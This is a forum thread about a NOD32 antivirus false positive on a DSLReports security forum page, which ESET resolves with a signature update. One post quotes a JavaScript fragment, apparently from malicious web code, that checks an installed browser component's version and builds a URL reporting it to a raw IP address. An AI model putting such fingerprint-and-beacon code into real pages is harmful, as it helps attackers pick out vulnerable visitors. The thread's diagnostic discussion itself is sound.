Warning from NOD32 on DSLR-security-forum thread

Posting in this thread at DSLR Security forum:
http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

 

The thread at the DSLR board on which NOD32 gives a warning, is this one:

hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

(I have changed http into hxxp)

That thread is two pages long on my machine and I get the warning on the second page.

I have already send an IM to Marcos here on the Wilders board.
I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
I hope that they will have a look at it after the weekend (please).

 

Maybe the following two screenshots are too big.

IMON warning

 

AMON warning

 

Do you suspect that the javascript detection is false positive ?

 

Hi HiTech_boy,

Somehow that is indeed what I'm thinking.
I hardly can believe that there is a malware on the DSLR/BBR security forum.
The warning I am getting, is making me thinking of an heuristic detection.
I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
If I see any warning from NOD32 on a file, of course I would send it in in a password protected ZIP-file; but what to do in this case? That's why I have send Marcos an IM here at Wilders.

 

There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

Code:

var i,l,v;  
num = 2;  
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';  
l = testing.isComponentInstalled(s,'ComponentID');  
v = testing.getComponentVersion(s,'ComponentID');  
if (l == true) {  
x = v.split(',');  
if ( (x[0]!=0) && (x[2]<3810) ) {  
num = 1;  
     }  
   }  
  
c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;

Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags and save the file as test.html or whatever and watch NOD32 to quarantine it.

 

said by doktornotor:

Hi,

Where has this been debated before?

 

Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently heuristics issue specific to NOD32, tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.

 

OK, thanks for checking it !

Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).

 

As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.

 

Currently with update 3634 , I no longer see any alerts and I can browse the forum

 

Yeah, looks good now.

 

Yep, it's fixed

Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !